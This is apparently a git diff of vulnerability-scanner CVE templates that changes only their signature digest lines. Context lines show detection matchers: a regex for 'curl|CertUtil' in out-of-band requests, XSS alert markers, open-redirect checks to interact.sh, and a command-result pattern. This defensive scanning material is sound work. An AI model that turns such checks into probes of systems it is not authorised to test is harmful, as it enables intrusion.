490a0046304402206e315588ca65297173b6814bc6172397458309ebd730542d6d0aed165442ab5d022054bd3fded5b447cdb4d288ef12338c62319a42e3576f5cb78f32945ed424f4dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204cc084a891afe65feaedc4d3bedf1a788cdda0c866607afffe419ee6c7a383be02201e523c62400ede7ae1a57e0e6def810eb9b32c0e745d04df46dffa1d099cdb44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21801.yaml b/http/cves/2021/CVE-2021-21801.yaml index 2688c2f724..88f78c0f84 100644 --- a/http/cves/2021/CVE-2021-21801.yaml +++ b/http/cves/2021/CVE-2021-21801.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022028dd003a44a9702befd4cdafccf356aabf08e207ef3c8c0e5eb1d535064326b402205d4243a377e793952264578149afc3cdc9910c0e9726edeb5c3bcb82fcddd527:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dc5a530dcbed5107a9a5669eb4ac1c9c26ad9330b52462591c4e0b8b257f53b7022001f4432c5b36fa5ad9816aef10bdb1a75f00e675d17a1d926bc031f6e06afe6c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21802.yaml b/http/cves/2021/CVE-2021-21802.yaml index 24a6ed9c5f..0b9fe72f4c 100644 --- a/http/cves/2021/CVE-2021-21802.yaml +++ b/http/cves/2021/CVE-2021-21802.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b65c1a7c0caee4cc49ce03a121778de8d65d17b11bb2394279d0fca029d611eb022100f2ce7dd5d0ac03d233b2fbb513a64ce3e55f76c813b11c6c83f7db84c7397774:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cd46af1935b78ddabc1df51e8d524d1eb0f1512af303e5782c69254e0ffc7b41022100d50646e7154c919aede3e7f7a7d121c3b53195dab4670007883da7f12d2e29a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21803.yaml b/http/cves/2021/CVE-2021-21803.yaml index 5a5e7ee01f..4f135e9f81 100644 --- a/http/cves/2021/CVE-2021-21803.yaml +++ b/http/cves/2021/CVE-2021-21803.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220290c465e8ffed921fc075e33c05d61e6ad6c8dc976ad0768a3c67c27cf6c886d022015809e3ad84f8ad4271e11246380311837a9a3a71febd990084cb12f5a2a7961:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201ef243b14cb6e6a9ac0a8809f023d4ee4dcdc462a9eae9d526b1593a9a6d638d022100f4328f142294b05759c426f4c852868f8a12d870a7f9a3c162666f237f125101:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21805.yaml b/http/cves/2021/CVE-2021-21805.yaml index fe9d9b89f1..e258ea3eb1 100644 --- a/http/cves/2021/CVE-2021-21805.yaml +++ b/http/cves/2021/CVE-2021-21805.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220239da739e577f078def3474254759fb447a0e1c7ae5e5c894fc15f3748b3752b022039afb1da09e145478b68a7981ab742ece2729a5f473a12d97e7c259b4bddafb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ed5cb77663b1fa02a079d9ba371969da6ff88146c44decf1b1f53374283703ab022100c105fb80e89a73b650554efd5e75498fbd87feb1bc553f1b77e3985f208107a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21978.yaml b/http/cves/2021/CVE-2021-21978.yaml index 81b64d6de3..6338700fc8 100644 --- a/http/cves/2021/CVE-2021-21978.yaml +++ b/http/cves/2021/CVE-2021-21978.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100dec5bc6259fe2ebe995f7e00acc2aeae9d9f6ca2612511f10dec4db4e5aec09c022005b30572b35de55a0959da7910704be0e21d80767290799899204fbd718bdc17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a935a2e83de4a7e04f4be120e042c42ababadca5c6eae96c4b1ab1c6cadbf627022100a9005c42b0b1f2dcfab48457002fc32029d03fd6e46f561f508c03c4621f7743:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-22005.yaml b/http/cves/2021/CVE-2021-22005.yaml index e13d41f8d8..6bdc461f40 100644 --- a/http/cves/2021/CVE-2021-22005.yaml +++ b/http/cves/2021/CVE-2021-22005.yaml @@ -49,4 +49,4 @@ http: - "contains(body_1, 'VMware vSphere')" - "content_length_2 == 0" condition: and -# digest: 4a0a0047304502210096eeb1ab5ef33413e6827bc5c906e65ca58db66c0a4facc6185b209e745b14b7022003c37bb9242faba402e242e1e6d4443e7704ad4e1f9f5a437295a89d9a45f441:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e3cdb9bdf44186d52c6da410d81899c0228cc759fd45b311962db3edb8df80ee022100b6a85324e12cc4066bcd4f206f9ad888057aa8d4f0de24c90db0c5e32046ac9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-22053.yaml b/http/cves/2021/CVE-2021-22053.yaml index f3f34b8b6b..9ed5768217 100644 --- a/http/cves/2021/CVE-2021-22053.yaml +++ b/http/cves/2021/CVE-2021-22053.yaml @@ -47,4 +47,4 @@ http: part: interactsh_request regex: - 'curl|CertUtil' -# digest: 4a0a00473045022100b4d3fe94711032d1a972803e2c53190fdefe451c2d9218a6df5094091460bd3c022017cebf0f65907519fa5d09748a58c0d8480286435615ad8a2d569a9f669b6a06:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b3d33b409d401a6c893da1d54129a4fe98ab40893e0f1015ffbc530d0a8a4dc7022020e8d50b4ee80bab89b60df1db166bbecd327512704970637085dd74e85225fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-22054.yaml b/http/cves/2021/CVE-2021-22054.yaml index 391970c475..cf1cf472fe 100644 --- a/http/cves/2021/CVE-2021-22054.yaml +++ b/http/cves/2021/CVE-2021-22054.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008cded273bebf41eff90732aed8ea7da8aa14ca8124eaa2032d424ca27e56d6e7022079f5f692df095ec9105de7a2f9449144593cfd651fe28038d367431e92871cc8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200640c5d5544ff6ef991bb415c29eb38caa4db8b69a6f71b9129970b31160c5d6022046e1514bce42721ffde6904f23c3bc950efb604d47d46454c3d9e77fcb54d9f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-22122.yaml b/http/cves/2021/CVE-2021-22122.yaml index b76ed058ac..c071ecba55 100644 --- a/http/cves/2021/CVE-2021-22122.yaml +++ b/http/cves/2021/CVE-2021-22122.yaml @@ -44,4 +44,4 @@ http: - "alert('document.domain')" - "No policy has been chosen." condition: and -# digest: 4a0a00473045022100c166482f4524b3791b930460c6d197fdf8604c263fd9455f9d2e32f58da90a5c022064d7ba4d9e05973aec6889fd5dc2a740add4ccd266523146f2df998b31ce8a66:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f739400bf52f8dec1f217ed4d31b7f9f956aa0ca517d675ee5495ae2cd887b5c02207daaa0d190e01b48eef9b056c954a640ff59c3a9b91e4e624e6195e664a87e16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-22145.yaml b/http/cves/2021/CVE-2021-22145.yaml index c89c8a3799..aadcacb2f6 100644 --- a/http/cves/2021/CVE-2021-22145.yaml +++ b/http/cves/2021/CVE-2021-22145.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 400 -# digest: 4a0a00473045022014f0323c07e1c9f0a832d65c29ff4d67516455694fba9ccd53727b9fc4a6d38c022100fe6eb1ab330b614a4bd5dfc06532870a99005fcd2fabb1a02f2ed6cc21799534:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200ae0e81a1c19ce52ceb50640f4c1ab86ac60b6379dbbe6f47792a4572e351d0c02203f716a5a8e0d7c6faa8e9672792f913b374029ef53dff1690395b0a63e688dcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-22205.yaml b/http/cves/2021/CVE-2021-22205.yaml index d81fa9d992..7acd120f1e 100644 --- a/http/cves/2021/CVE-2021-22205.yaml +++ b/http/cves/2021/CVE-2021-22205.yaml @@ -140,4 +140,4 @@ http: group: 1 regex: - '(?:application-)(\S{64})(?:\.css)' -# digest: 490a00463044022021787cd9270a230364edc25682b32eedd71949d7c6a77c9b84308a540f85761502203bbfe2d4d8ee766566ca25be55039a765ee27d86e8b66ff4f6971796a255e1e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100abc381440f9275837d7e15eedee65a255ebe4897cdd81a9ec8bddc15e9fff97f02204d5198bbdca5253fecaf70b30ba2a9cb00162a44795ea0769c8d3c00f92c72fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-22214.yaml b/http/cves/2021/CVE-2021-22214.yaml index 84be035b41..c7acf1110c 100644 --- a/http/cves/2021/CVE-2021-22214.yaml +++ b/http/cves/2021/CVE-2021-22214.yaml @@ -53,4 +53,4 @@ http: part: body words: - "does not have valid YAML syntax" -# digest: 4b0a00483046022100ff420e3f4d9d72d0aa090c7edd70646581bc6078a639d8c4eecddd0e337109bc022100f49642428c995841527b11d305d4c38776bd64b61bd40052ed4faca9e93d9c75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009043529bbd2ee9d188c51b061bf113c007b7479375096d44f609b5c3e2fc23c5022100917d35c7dd970f582fedd2c0f51529e96d71d76fe07d448ce3ffb17b392fb980:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-22707.yaml b/http/cves/2021/CVE-2021-22707.yaml index 991de64f34..20ad76d934 100644 --- a/http/cves/2021/CVE-2021-22707.yaml +++ b/http/cves/2021/CVE-2021-22707.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c2ddc524c81bab04c11b51b6377bb61707042a4f1c9007e4d4fc8dd4b9c415ba022100df0afe79fce39ccb1592f7893da9933c9b1a645a95fa1e6be05a57e53c2b67aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201dd62e40407144bfef7ec5c935ad7d0dbf6f7da3ab40ea8b5defb014c9292100022052c5c81fa72fdb0e69598dda215e657d24019497cffebb3dbad0988db0588af5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-22873.yaml b/http/cves/2021/CVE-2021-22873.yaml index 592773fda4..fde9c3bb60 100644 --- a/http/cves/2021/CVE-2021-22873.yaml +++ b/http/cves/2021/CVE-2021-22873.yaml @@ -51,4 +51,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4b0a00483046022100fe9c76568f5c17d3ad5ca41852a87aca6cd7e386594a11c8e7cebc5b7d8a4c80022100d022d0ad67a7f96e9fbbfa6a04d805a775c312dab24b5b5e7ffa55a9f3751390:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220663af91463a6a4ca2abb22b5ef2800bcedf617cefdf7095c37774a8bec69c3de022100fc1cc469236ab053e23f1f424dd78b36b008320e5044ac7b29e9cc6b6d58a224:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-22911.yaml b/http/cves/2021/CVE-2021-22911.yaml index 2946efdf9c..15294b2567 100644 --- a/http/cves/2021/CVE-2021-22911.yaml +++ b/http/cves/2021/CVE-2021-22911.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202ceec4399b237de979a8a362eb44fad120bd7bb964bb3fcdbb6d6a01e6557c52022100894d28662f6e764af7d0e5fca1e84474779041d8ac3df6fa020f407efa627421:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206afa99df22230016448a0b9e4364d9a635e1c8fd7cfd72660a762d448cbd4f5d0220095bfe68aa3b132862d07e4ef9a816e4cb65bbaa068d0625b536a97b43d87319:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-22986.yaml b/http/cves/2021/CVE-2021-22986.yaml index 3156921190..03c484154c 100644 --- a/http/cves/2021/CVE-2021-22986.yaml +++ b/http/cves/2021/CVE-2021-22986.yaml @@ -75,4 +75,4 @@ http: regex: - "\"commandResult\":\"(.*)\"" part: body -# digest: 4a0a0047304502205b6103e9c4287d5da718fb79ec432f89995dbdb62f4452ca4f0b7984d1c4bb11022100ece1ce92a2ba853152334fb7ed172e4d6214d384761a67459317cf8e857e8128:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022033f4b6a3a38e1e220d5ead60be586ddc4599d92ea8b4d4398d594463575ed237022056dd65d7e05c3942adfaaf7a94a5024388f73303e77ac7c923e5eb8feda94cb3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24145.yaml b/http/cves/2021/CVE-2021-24145.yaml index 686929fe9e..a037fd7015 100644 --- a/http/cves/2021/CVE-2021-24145.yaml +++ b/http/cves/2021/CVE-2021-24145.yaml @@ -68,4 +68,4 @@ http: part: body_3 words: - '{{md5(string)}}' -# digest: 4a0a00473045022100eb908dd55285a9d68012b0deb023c829756d657d18a89b83a500e349b9414fdc0220797b8bd8acbf0f11d56926e26306dcaaf73faad50e06780881b5dcea9c5251ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008f0ce98ee970e43771441d34c4ddb6a936223550c6a25e53079a2cbb79b11926022100be4c7dee887a3da101404a2f12a35b8ef8c5f34d7396462b88f9031f53e29f09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24165.yaml b/http/cves/2021/CVE-2021-24165.yaml index f94ba1a63c..f4dfbc1a06 100644 --- a/http/cves/2021/CVE-2021-24165.yaml +++ b/http/cves/2021/CVE-2021-24165.yaml @@ -55,4 +55,4 @@ http: - 'status_code_2 == 302' - "contains(header_2, 'Location: https://interact.sh?client_id=1')" condition: and -# digest: 4a0a00473045022100af649c1abdb63fdedcc1e46e68a77c520ee591eac3e400bbaa84654855512c8902200eb0a2419a23469cfae750f62bd2f38b597658927a13e0dc3aabafb3c49025dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dbe91ea50dd379c515d3eee6699a845d148a111391c7303db2a193b9eda920ea022061e3ec8779c027810f1f1f1cba44c0df3db63590a5d0808e1bb4ee5e8ee9f522:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24169.yaml b/http/cves/2021/CVE-2021-24169.yaml index b4634e5e00..cd4d59025e 100644 --- a/http/cves/2021/CVE-2021-24169.yaml +++ b/http/cves/2021/CVE-2021-24169.yaml @@ -50,4 +50,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "woo-order-export-lite")' condition: and -# digest: 4b0a004830460221009d6516913d6729de70ed63ad691d2279e02dccb63785273ce41ad95627d09b600221008c2ad831a4ea154a285ac6cc8782e79d2963279dd7368f98298158f17ca2bedf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220088e88fce003d52c31b00f5dfee3fd31732ed9cf84e53ebd02d783bbd5e33f9e02204ea3fe03c47fafef315a0010ecf459941a1c5599bcbc85eb3fa7eb5e564d56c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24214.yaml b/http/cves/2021/CVE-2021-24214.yaml index 539210ccab..04a74913bc 100644 --- a/http/cves/2021/CVE-2021-24214.yaml +++ b/http/cves/2021/CVE-2021-24214.yaml @@ -65,4 +65,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206fc7f4432dfb77192a80cf4d997a216a19b49797038590bc872b29213ac7583702203b5e05a054ce8e225e79baf93062589c32a2ca5381d2dbe7b305083323a93600:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f2a3d9930e0fde5f6bcb71f2c59eaa85e3572ed307c67a7640172e0be08f3d120220271fec82e3f65b2c757047deeacf4c68ee53c11fa6c9a162278ebe28b34d057e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24215.yaml b/http/cves/2021/CVE-2021-24215.yaml index 6823dc6620..6d571939e6 100644 --- a/http/cves/2021/CVE-2021-24215.yaml +++ b/http/cves/2021/CVE-2021-24215.yaml @@ -51,4 +51,4 @@ http: - 'contains(content_type_2, "text/html")' - 'contains(body_2, "This page allows direct access to your site settings") && contains(body_2, "Controlled Admin Access")' condition: and -# digest: 4a0a00473045022100ce8b5d92f92657b495f0d0e99056e7b9bb7f133c8b77529959e1c2851b9051a9022055704998cb439b67c0756f7a39ac3850f241afa4666f6b8ded396450dcb59f59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b6ba39eb8c10b2c00f154fb9e06a3f16a51818ba25a713f46b224ae78b7b08e3022100f9a70545d94a0a5654a19de02b7fd4bd02a03739783bf7ef65553e5d9e73f069:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24227.yaml b/http/cves/2021/CVE-2021-24227.yaml index 097ff33b6d..94c9ba3028 100644 --- a/http/cves/2021/CVE-2021-24227.yaml +++ b/http/cves/2021/CVE-2021-24227.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e010a58406c9d302cf5a336366e3e9bd83259ab417eaabcc9e9e7aad71f7379c0220646868c3ac63cba246f32a22e9fa9ce7ad8df8bc22a398e46198334eddbd7c4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d715a8e520cf5727c132342f09ac7b40097daca062029a9cb8f6b7bf2bd6c5ba0220142bb7c95232cdbb5e7fc81003752a1bd8d72ab9bb20e42fa86153d12f216f67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24235.yaml b/http/cves/2021/CVE-2021-24235.yaml index 7e97211902..8f9371ba65 100644 --- a/http/cves/2021/CVE-2021-24235.yaml +++ b/http/cves/2021/CVE-2021-24235.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207172378464726e156cb63127750d8141c27c54fcca61e8ac543695934d8177cc0220120dd46612aca278b023793c297b93335bd16a9ce26edb7eaf12e9dd092e5052:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009d23108ba1cdd72e6bfe6cfe6e507299b767640b3a46324e24d3a1cd1ca292ee022060651971ff50dd0882e7ba4d6d58d652b8f0f4674786a748317450e52b2c4830:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24237.yaml b/http/cves/2021/CVE-2021-24237.yaml index c0e7dbf23a..7f407f270c 100644 --- a/http/cves/2021/CVE-2021-24237.yaml +++ b/http/cves/2021/CVE-2021-24237.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204b9bcf654a4fdbd7dd7b23c12beaa5286360f594247e37850e45dce56acfa10f02210098b0b6add57f62bf6677700e736e62b4182e01c7236ca9127ab47e2746206de9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201fc726e55c9bf9929e37f6006909fbb32a677d575807c2111365c7be4477fc980221009cb351f18b9772924ba5afcb3b1bfb45b790ff5d8efbba818699450a917da774:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24239.yaml b/http/cves/2021/CVE-2021-24239.yaml index ead9379a4d..2cb93cb77a 100644 --- a/http/cves/2021/CVE-2021-24239.yaml +++ b/http/cves/2021/CVE-2021-24239.yaml @@ -54,4 +54,4 @@ http: - 'status_code == 200' - 'contains(body, "") && contains(body, "invitaion-code-table")' condition: and -# digest: 490a0046304402201ee2a4557fba7636af6a7f66ace986f366c1b8b98975c008971287a6b7b66d2802204e5cace0f361c36db2bc2e80e1931aba048e7cf304d3668b487400cad63f4773:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b99a39f4abdc6dca07eb7f5ab3dd7fe8111515935493a27d4ee44ae0d090e72d022100a5016274628bb830de4aa3f88794468720b50096965f9e1b4df30029b75c3885:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24275.yaml b/http/cves/2021/CVE-2021-24275.yaml index 490c15abcd..c3274e5f2b 100644 --- a/http/cves/2021/CVE-2021-24275.yaml +++ b/http/cves/2021/CVE-2021-24275.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202e8b612008e7b0431de014a13bfb6d727ae9e6d71ea87d4d29754936012f118e022100bb024808d77aed7e62c623b62b8e653220673c8f814fb7575dfa7f7df1056248:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201e2ceeffc6debc4a9f2bcab33c299f89ea8f059834bcadd14ed1ce12254f7638022100e939c158d51778be923e5bda4ff02bdb8fb85e3f133afd6508d7c1c9547eb485:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24276.yaml b/http/cves/2021/CVE-2021-24276.yaml index 008efe6cda..0bd7919fd2 100644 --- a/http/cves/2021/CVE-2021-24276.yaml +++ b/http/cves/2021/CVE-2021-24276.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ccf19553c3785450c335d57b9e48236787603b65f193d92a7aa7845a9f18ea87022100bfc9570db36ebaebe97547ffa74f02f047c2ae49cca8f2653f2c9dbf1e5bab3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dc5ae696a3713e5efe99907c2c5316b86c4f55c217dfe61338fc36f6c3879dc002204f97750378dd8bb6166a795ddb6f7f0b7013314c8985d1232d49854a8f34f942:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24278.yaml b/http/cves/2021/CVE-2021-24278.yaml index 24c2b6839f..be2161f201 100644 --- a/http/cves/2021/CVE-2021-24278.yaml +++ b/http/cves/2021/CVE-2021-24278.yaml @@ -58,4 +58,4 @@ http: regex: - '"nonce":"[a-f0-9]+"' part: body -# digest: 4b0a00483046022100d9abb764ee6563027af072cc23d4c9c16f80410112aba32996d15ad9d82c5a5a022100e439314dc9a6527a0d80b588b231ae631ee122f0d97542b41b800ffed7a3f51f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c8fac8fdf71326555a5486e0e8e4cee24f7c0935a646560cea1647dc070116c4022032a19f5428b2a56be9a82a4133abf280624b3aaf97b89bfed02d8b4f37761fe4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24285.yaml b/http/cves/2021/CVE-2021-24285.yaml index 316e6675b6..db70d6ff1d 100644 --- a/http/cves/2021/CVE-2021-24285.yaml +++ b/http/cves/2021/CVE-2021-24285.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220172be49164feec344dfa1d49f0cdf335917a5d2a75846fce80ea6e1bbe5b7bee02210089fab324ff44731061d8adcd715f206c9c089bd9a7fe64fea86c8c3aedf97623:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ba643fedbb91f2466bb237a3b7bbbdd45946e6b3bfd4091c04289cca1bd8eb99022100c750742c674d9cc5638542af36f2a8e66e9f8b5c6cf37ada103caf15f2183444:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24286.yaml b/http/cves/2021/CVE-2021-24286.yaml index f42407ae19..9a9025a2b6 100644 --- a/http/cves/2021/CVE-2021-24286.yaml +++ b/http/cves/2021/CVE-2021-24286.yaml @@ -48,4 +48,4 @@ http: - 'contains(body_2, "alert%28document.domain%29") && contains(body_2, "Moove redirect 404")' - 'status_code_2 == 200' condition: and -# digest: 4b0a004830460221009c8a16dca3ea8098cdf84c96ec66655812cb68fb55b9e286f7fe420d60faa9110221009d1a382904cfdd55a6f49320a79ef9b8f3b938ad8bc9db2d8b1fadfd597b6e3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e13cf44f9820ec6052cab59923d3de1acb5b79d5e76496d09430617eb597685102210089949e4eb6ccb5c5d6c11c6411dde8a2652b795b441adfcbd1f4c9ad1a1add36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24287.yaml b/http/cves/2021/CVE-2021-24287.yaml index e7c9fbea8e..b8cac92ac4 100644 --- a/http/cves/2021/CVE-2021-24287.yaml +++ b/http/cves/2021/CVE-2021-24287.yaml @@ -50,4 +50,4 @@ http: - 'contains(body_2, "alert(document.domain)")' - 'contains(body_2, "Set up the taxonomies")' condition: and -# digest: 490a004630440220331de77e11f4fd8c6eb5947ea08b967c217e35cecc249be01ac24e264c67cb8402205f29a68c7018c29021c2f9a42175170a1c54ed085d505a1ed2d012236cac7ec8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202036a3f93bdb549d836947fffa1278b976413fdd5a88b48901098c1d739b84cd02205f829905ae6e30de9cfeff518f4631b04feae75749c3f90a6b7b8cd5d89f1f63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24288.yaml b/http/cves/2021/CVE-2021-24288.yaml index 0ec9ba6c6a..7f9ac18834 100644 --- a/http/cves/2021/CVE-2021-24288.yaml +++ b/http/cves/2021/CVE-2021-24288.yaml @@ -39,4 +39,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4a0a00473045022100dea3cbf54f50326db8a7cbe9c797a7d01e224af22ec2b849fde4047988e95b50022052cd3007e67dc0c21a9cb9d2bb25fce7cf31bb2d63ecfe1d826358cfb03c9983:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009abf7c72e4673c71efb3164fa015476a4a3eac0974adc0c3c8a43d3f5674c711022100eb04bf1f3ac4b6c03bfb650e38cce35ea6e62b2debd446add9967fe56a7bbdbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24291.yaml b/http/cves/2021/CVE-2021-24291.yaml index 3d9a76faf9..9cfe43d4db 100644 --- a/http/cves/2021/CVE-2021-24291.yaml +++ b/http/cves/2021/CVE-2021-24291.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220530060b9231214c3948331f2fc9151166f95e489be988572b86a607150d1ef12022100aacb96e91813386ae60992bae5c87ad91e0ca09b7a1801f42b2d7cdf30950423:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203e2a4280ee0651e5647945e4903da98fa98c222ddd7b9235a6d9438e3485841402206d0d38add1a01e0032859c32ec3152b0a8ceaece887c99aa97f955a93b804c0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24316.yaml b/http/cves/2021/CVE-2021-24316.yaml index ae31119e67..2c9947ee62 100644 --- a/http/cves/2021/CVE-2021-24316.yaml +++ b/http/cves/2021/CVE-2021-24316.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200ae8fcc2d6914ccc76596fda76037f35a2be4f783e8235640658b1ddcca4fd0d02204cfde07015adbd07b9e358a136ff26a457fd6c72dea188f3957fcd0e55048236:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202de8ec115ae8a3bb318422ecf0582ed6dbda74e0aec7858ba6c8616ff657977a02207416f4b88d848c9ed14c944616a1822b061cddd6abfb08293deb1987e14ff9a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24320.yaml b/http/cves/2021/CVE-2021-24320.yaml index da9d500fb7..6b4aa6e017 100644 --- a/http/cves/2021/CVE-2021-24320.yaml +++ b/http/cves/2021/CVE-2021-24320.yaml @@ -65,4 +65,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008e15f1d12a3c256545b2354d77805fba07dab4bd51e44c3fe7091d44faae1335022100a6fb26884ef13ceb3a1c3a2e828fd31823f1db0983fe693cbcfc5123cb4419ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022014722415f9ae063b808bcd4ac28d7a9b396691db69e28476da39b6334b500023022100e8bd3f1af2ba25ea96591e2a83134dcc3dd5f659df9340e6bd61b8e03c14c069:922c64590222798bb761d5b6d8e72950 \ 